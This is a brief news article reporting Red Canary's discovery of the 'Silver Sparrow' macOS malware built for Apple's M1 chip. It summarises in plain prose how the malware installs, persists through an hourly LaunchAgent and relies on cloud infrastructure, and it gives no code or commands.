Malware monsters target Apple’s M1 chip with ‘Silver Sparrow’
US security consultancy Red Canary says it has found MacOS malware written specifically for the shiny new M1 chip that Apple created to power its post-Intel Macs.
Red Canary has named the malware “Silver Sparrow” and says it had found its way onto almost 30,000 MacOS devices as of February 17th.
Red Canary’s post says it has analyzed two samples of the malware, one targeting x86 and the other targeting X86 and Apple’s own M1 silicon chip. The firm says both samples “leverage the macOS Installer JavaScript API to execute suspicious commands.” That’s not unusual behavior for a legitimate software installer package, but Red Canary says it’s not spotted it in malware before.
Once the scripts run, a Mac will have two new and nasty files one of which phones home to the malware’s authors to report it was installed.
The other script is driven by a persistent LaunchAgent that runs it hourly to connect with a server and request more information from whoever controls the malware.
Red Canary says that hourly request “tells launchd to execute a shell script that downloads a JSON file to disk, converts it into a plist, and uses its properties to determine further actions.”
The firm’s researchers ran the malware for a week and never saw that request result in a download, leading them to suggest the malware currently lacks a payload.
How the malware is distributed remains a mystery, but Red Canary’s researchers have divined that it uses resources in AWS and Akamai’s content distribution network. The firm suggests Silver Sparrow’s authors therefore appear to have a decent understanding of how working in a public cloud and CDN makes it harder to defend against malware because organizations often have very good reasons to welcome traffic from large public clouds.
Share Your Thoughts?